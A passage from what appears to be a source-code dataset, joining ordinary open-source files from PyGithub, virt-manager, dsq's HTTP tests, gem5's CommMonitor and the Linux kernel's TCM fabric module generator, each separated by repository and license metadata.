"DELETE",
self.url
)
def edit(self, name, config, events=github.GithubObject.NotSet, add_events=github.GithubObject.NotSet, remove_events=github.GithubObject.NotSet, active=github.GithubObject.NotSet):
"""
:calls: `PATCH /repos/:owner/:repo/hooks/:id <http://developer.github.com/v3/repos/hooks>`_
:param name: string
:param config: dict
:param events: list of string
:param add_events: list of string
:param remove_events: list of string
:param active: bool
:rtype: None
"""
assert isinstance(name, (str, unicode)), name
assert isinstance(config, dict), config
assert events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in events), events
assert add_events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in add_events), add_events
assert remove_events is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in remove_events), remove_events
assert active is github.GithubObject.NotSet or isinstance(active, bool), active
post_parameters = {
"name": name,
"config": config,
}
if events is not github.GithubObject.NotSet:
post_parameters["events"] = events
if add_events is not github.GithubObject.NotSet:
post_parameters["add_events"] = add_events
if remove_events is not github.GithubObject.NotSet:
post_parameters["remove_events"] = remove_events
if active is not github.GithubObject.NotSet:
post_parameters["active"] = active
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.url,
input=post_parameters
)
self._useAttributes(data)
def test(self):
"""
:calls: `POST /repos/:owner/:repo/hooks/:id/tests <http://developer.github.com/v3/repos/hooks>`_
:rtype: None
"""
headers, data = self._requester.requestJsonAndCheck(
"POST",
self.url + "/tests"
)
def _initAttributes(self):
self._active = github.GithubObject.NotSet
self._config = github.GithubObject.NotSet
self._created_at = github.GithubObject.NotSet
self._events = github.GithubObject.NotSet
self._id = github.GithubObject.NotSet
self._last_response = github.GithubObject.NotSet
self._name = github.GithubObject.NotSet
self._test_url = github.GithubObject.NotSet
self._updated_at = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "active" in attributes: # pragma no branch
self._active = self._makeBoolAttribute(attributes["active"])
if "config" in attributes: # pragma no branch
self._config = self._makeDictAttribute(attributes["config"])
if "created_at" in attributes: # pragma no branch
self._created_at = self._makeDatetimeAttribute(attributes["created_at"])
if "events" in attributes: # pragma no branch
self._events = self._makeListOfStringsAttribute(attributes["events"])
if "id" in attributes: # pragma no branch
self._id = self._makeIntAttribute(attributes["id"])
if "last_response" in attributes: # pragma no branch
self._last_response = self._makeClassAttribute(github.HookResponse.HookResponse, attributes["last_response"])
if "name" in attributes: # pragma no branch
self._name = self._makeStringAttribute(attributes["name"])
if "test_url" in attributes: # pragma no branch
self._test_url = self._makeStringAttribute(attributes["test_url"])
if "updated_at" in attributes: # pragma no branch
self._updated_at = self._makeDatetimeAttribute(attributes["updated_at"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
| gpl-3.0 |
virt-manager/virt-manager | virtManager/asyncjob.py | 2 | 10247 | # Copyright (C) 2006, 2013 Red Hat, Inc.
# Copyright (C) 2006 Hugh O. Brock <hbrock@redhat.com>
#
# This work is licensed under the GNU GPLv2 or later.
# See the COPYING file in the top-level directory.
import threading
import traceback
from gi.repository import Gdk
from gi.repository import GLib
import libvirt
import virtinst.progress
from .baseclass import vmmGObjectUI
class _vmmMeter(virtinst.progress.Meter):
def __init__(self, pbar_pulse, pbar_fraction, pbar_done):
virtinst.progress.Meter.__init__(self, quiet=True)
self._pbar_pulse = pbar_pulse
self._pbar_fraction = pbar_fraction
self._pbar_done = pbar_done
#################
# Internal APIs #
#################
def _write(self):
if self._size is None:
self._pbar_pulse("", self._text)
else:
fread = virtinst.progress.Meter.format_number(self._total_read)
rtime = virtinst.progress.Meter.format_time(
self._meter.re.remaining_time(), True)
frac = self._meter.re.fraction_read()
out = "%3i%% %5sB %s ETA" % (frac * 100, fread, rtime)
self._pbar_fraction(frac, out, self._text)
#############################################
# Public APIs specific to virt-manager code #
#############################################
def is_started(self):
return bool(self._meter.start_time)
###################
# Meter overrides #
###################
def start(self, *args, **kwargs):
super().start(*args, **kwargs)
self._write()
def update(self, *args, **kwargs):
super().update(*args, **kwargs)
self._write()
def end(self, *args, **kwargs):
super().end(*args, **kwargs)
self._pbar_done()
def cb_wrapper(callback, asyncjob, *args, **kwargs):
try:
callback(asyncjob, *args, **kwargs)
except Exception as e:
# If job is cancelled, don't report error to user.
if (isinstance(e, libvirt.libvirtError) and
asyncjob.can_cancel() and
asyncjob.job_canceled):
return # pragma: no cover
asyncjob.set_error(str(e), "".join(traceback.format_exc()))
def _simple_async_done_cb(error, details,
parent, errorintro, errorcb, finish_cb):
if error:
if errorcb:
errorcb(error, details)
else:
error = errorintro + ": " + error
parent.err.show_err(error,
details=details)
if finish_cb:
finish_cb()
def _simple_async(callback, args, parent, title, text, errorintro,
show_progress, simplecb, errorcb, finish_cb):
"""
@show_progress: Whether to actually show a progress dialog
@simplecb: If true, build a callback wrapper that ignores the asyncjob
param that's passed to every cb by default
"""
docb = callback
if simplecb:
def tmpcb(job, *args, **kwargs):
ignore = job
callback(*args, **kwargs)
docb = tmpcb
asyncjob = vmmAsyncJob(docb, args,
_simple_async_done_cb,
(parent, errorintro, errorcb, finish_cb),
title, text, parent.topwin,
show_progress=show_progress)
asyncjob.run()
def idle_wrapper(fn):
def wrapped(self, *args, **kwargs):
return self.idle_add(fn, self, *args, **kwargs)
return wrapped
class vmmAsyncJob(vmmGObjectUI):
"""
Displays a progress bar while executing the "callback" method.
"""
@staticmethod
def simple_async(callback, args, parent, title, text, errorintro,
simplecb=True, errorcb=None, finish_cb=None):
_simple_async(callback, args, parent,
title, text, errorintro, True,
simplecb, errorcb, finish_cb)
@staticmethod
def simple_async_noshow(callback, args, parent, errorintro,
simplecb=True, errorcb=None, finish_cb=None):
_simple_async(callback, args, parent,
"", "", errorintro, False,
simplecb, errorcb, finish_cb)
def __init__(self,
callback, args, finish_cb, finish_args,
title, text, parent,
show_progress=True, cancel_cb=None):
"""
@show_progress: If False, don't actually show a progress dialog
@cancel_cb: Cancel callback if operation supports it.
(cb, arg1, arg2, ...)
"""
vmmGObjectUI.__init__(self, "asyncjob.ui", "vmm-progress")
self.topwin.set_transient_for(parent)
self.show_progress = bool(show_progress)
cancel_cb = cancel_cb or (None, [])
self.cancel_cb = cancel_cb[0]
self.cancel_args = [self] + list(cancel_cb[1:])
self.job_canceled = False
self._finish_cb = finish_cb
self._finish_args = finish_args or ()
self._timer = None
self._error_info = None
self._data = None
self._details_widget = None
self._details_update_cb = None
self._is_pulsing = True
self._meter = None
self._bg_thread = threading.Thread(target=cb_wrapper,
args=[callback, self] + args)
self._bg_thread.daemon = True
self.builder.connect_signals({
"on_async_job_cancel_clicked": self._on_cancel,
})
# UI state
self.topwin.set_title(title)
self.widget("pbar-text").set_text(text)
self.widget("cancel-async-job").set_visible(bool(self.cancel_cb))
####################
# Internal helpers #
####################
def _cleanup(self):
self._bg_thread = None
self.cancel_cb = None
self.cancel_args = None
self._meter = None
def _set_stage_text(self, text, canceling=False):
# This should be thread safe, since it's only ever called from
# pbar idle callbacks and cancel routine which is invoked from the
# main thread
if self.job_canceled and not canceling:
return # pragma: no cover
self.widget("pbar-stage").set_text(text)
################
# UI listeners #
################
def _on_cancel(self, ignore1=None, ignore2=None):
if not self.cancel_cb or not self._bg_thread.is_alive():
return # pragma: no cover
self.cancel_cb(*self.cancel_args)
if self.job_canceled: # pragma: no cover
self.widget("warning-box").hide()
self._set_stage_text(_("Cancelling job..."), canceling=True)
##############
# Public API #
##############
def get_meter(self):
if not self._meter:
self._meter = _vmmMeter(self._pbar_pulse,
self._pbar_fraction,
self._pbar_done)
return self._meter
def set_error(self, error, details):
self._error_info = (error, details)
def has_error(self):
return bool(self._error_info)
def can_cancel(self):
return bool(self.cancel_cb)
def show_warning(self, summary):
# This should only be called from cancel callbacks, not a the thread
markup = "<small>%s</small>" % summary
self.widget("warning-box").show()
self.widget("warning-text").set_markup(markup)
def _thread_finished(self):
GLib.source_remove(self._timer)
self.topwin.destroy()
self.cleanup()
error = None
details = None
if self._error_info:
# pylint: disable=unpacking-non-sequence
error, details = self._error_info
self._finish_cb(error, details, *self._finish_args)
def run(self):
self._timer = GLib.timeout_add(100, self._exit_if_necessary)
if self.show_progress:
self.topwin.present()
if not self.cancel_cb and self.show_progress:
gdk_window = self.topwin.get_window()
gdk_window.set_cursor(
Gdk.Cursor.new_from_name(gdk_window.get_display(), "progress"))
self._bg_thread.start()
####################################################################
# All functions after this point are called from the timer loop or #
# the worker thread, so anything that touches Gtk needs to be #
# dispatches with idle_add #
####################################################################
def _exit_if_necessary(self):
if not self._bg_thread.is_alive():
self._thread_finished()
return False
if not self._is_pulsing or not self.show_progress:
return True
self._pbar_do_pulse()
return True
@idle_wrapper
def _pbar_do_pulse(self):
if not self.builder:
return # pragma: no cover
self.widget("pbar").pulse()
@idle_wrapper
def _pbar_pulse(self, progress="", stage=None):
self._is_pulsing = True
if not self.builder:
return # pragma: no cover
self.widget("pbar").set_text(progress)
self._set_stage_text(stage or _("Processing..."))
@idle_wrapper
def _pbar_fraction(self, frac, progress, stage=None):
self._is_pulsing = False
if not self.builder:
return # pragma: no cover
self._set_stage_text(stage or _("Processing..."))
self.widget("pbar").set_text(progress)
frac = min(frac, 1)
frac = max(frac, 0)
self.widget("pbar").set_fraction(frac)
@idle_wrapper
def _pbar_done(self):
self._is_pulsing = False
@idle_wrapper
def details_enable(self):
from gi.repository import Vte
self._details_widget = Vte.Terminal()
self.widget("details-box").add(self._details_widget)
self._details_widget.set_visible(True)
self.widget("details").set_visible(True)
@idle_wrapper
def details_update(self, data):
self._details_widget.feed(data.replace("\n", "\r\n").encode())
| gpl-2.0 |
baverman/dsq | tests/test_http.py | 1 | 3886 | import redis
import msgpack
import json
import pytest
from webob import Request
from dsq.store import QueueStore, ResultStore
from dsq.manager import Manager
from dsq.http import Application
from dsq.compat import bytestr
@pytest.fixture
def app(request):
cl = redis.StrictRedis()
cl.flushdb()
return Application(Manager(QueueStore(cl), ResultStore(cl)))
def test_json_404(app):
res = Request.blank('/not-found').get_response(app)
assert res.status_code == 404
assert res.json == {'message': 'Not found', 'error': 'not-found'}
def test_msgpack_404(app):
res = Request.blank('/not-found', headers={'Accept': 'application/x-msgpack'}).get_response(app)
assert res.status_code == 404
assert msgpack.loads(res.body, encoding='utf-8') == {'message': 'Not found', 'error': 'not-found'}
def test_invalid_content_type(app):
req = Request.blank('/push')
req.method = 'POST'
req.body = b'garbage'
res = req.get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'Content must be json or msgpack',
'error': 'invalid-content-type'}
def test_json_invalid_payload(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/json'
req.body = b'"dddd'
res = req.get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'Can\'t decode body', 'error': 'invalid-encoding'}
def test_msgpack_invalid_payload(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/x-msgpack'
req.body = b'"dddd'
res = req.get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'Can\'t decode body', 'error': 'invalid-encoding'}
def test_json_push(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/json'
req.body = bytestr(json.dumps({'queue': 'normal', 'name': 'boo', 'args': [1, 2, 3]}))
res = req.get_response(app)
assert res.status_code == 200
assert app.manager.queue.get_queue('normal')
def test_msgpack_push(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/x-msgpack'
req.body = msgpack.dumps({'queue': 'normal', 'name': 'boo', 'args': [1, 2, 3]})
res = req.get_response(app)
assert app.manager.queue.get_queue('normal')
def test_task_without_queue(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/json'
req.body = bytestr(json.dumps({'name': 'boo', 'args': [1, 2, 3]}))
res = req.get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'queue required', 'error': 'bad-params'}
def test_task_without_name(app):
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/json'
req.body = bytestr(json.dumps({'queue': 'boo'}))
res = req.get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'name required', 'error': 'bad-params'}
def test_result_get(app):
@app.manager.task
def add(a, b):
return a + b
req = Request.blank('/push')
req.method = 'POST'
req.content_type = 'application/json'
req.body = bytestr(json.dumps({'queue': 'boo', 'name': 'add',
'args': (1, 2), 'keep_result': 100}))
res = req.get_response(app)
tid = res.json['id']
assert Request.blank('/result?id={}'.format(tid)).get_response(app).json == None
app.manager.process(app.manager.pop(['boo'], 1))
assert Request.blank('/result?id={}'.format(tid)).get_response(app).json == {'result': 3}
def test_get_without_id(app):
res = Request.blank('/result').get_response(app)
assert res.status_code == 400
assert res.json == {'message': 'id required', 'error': 'bad-params'}
| mit |
aferr/LatticeMemCtl | src/mem/CommMonitor.py | 17 | 5021 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Thomas Grass
# Andreas Hansson
from m5.params import *
from MemObject import MemObject
# The communication monitor will most typically be used in combination
# with periodic dumping and resetting of stats using schedStatEvent
class CommMonitor(MemObject):
type = 'CommMonitor'
# one port in each direction
master = MasterPort("Master port")
slave = SlavePort("Slave port")
# control the sample period window length of this monitor
sample_period = Param.Clock("1ms", "Sample period for histograms")
# for each histogram, set the number of bins and enable the user
# to disable the measurement, reads and writes use the same
# parameters
# histogram of burst length of packets (not using sample period)
burst_length_bins = Param.Unsigned('20', "# bins in burst length " \
"histograms")
disable_burst_length_hists = Param.Bool(False, "Disable burst length " \
"histograms")
# bandwidth per sample period
bandwidth_bins = Param.Unsigned('20', "# bins in bandwidth histograms")
disable_bandwidth_hists = Param.Bool(False, "Disable bandwidth histograms")
# latency from request to response (not using sample period)
latency_bins = Param.Unsigned('20', "# bins in latency histograms")
disable_latency_hists = Param.Bool(False, "Disable latency histograms")
# inter transaction time (ITT) distributions in uniformly sized
# bins up to the maximum, independently for read-to-read,
# write-to-write and the combined request-to-request that does not
# separate read and write requests
itt_bins = Param.Unsigned('20', "# bins in ITT distributions")
itt_max_bin = Param.Latency('100ns', "Max bin of ITT distributions")
disable_itt_dists = Param.Bool(False, "Disable ITT distributions")
# outstanding requests (that did not yet get a response) per
# sample period
outstanding_bins = Param.Unsigned('20', "# bins in outstanding " \
"requests histograms")
disable_outstanding_hists = Param.Bool(False, "Disable outstanding " \
"requests histograms")
# transactions (requests) observed per sample period
transaction_bins = Param.Unsigned('20', "# bins in transaction " \
"count histograms")
disable_transaction_hists = Param.Bool(False, "Disable transaction count " \
"histograms")
# address distributions (heatmaps) with associated address masks
# to selectively only look at certain bits of the address
read_addr_mask = Param.Addr(MaxAddr, "Address mask for read address")
write_addr_mask = Param.Addr(MaxAddr, "Address mask for write address")
disable_addr_dists = Param.Bool(True, "Disable address distributions")
| bsd-3-clause |
jyh0082007/sigTaint | Documentation/target/tcm_mod_builder.py | 868 | 40692 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!se_nacl_new)\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (kstrtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
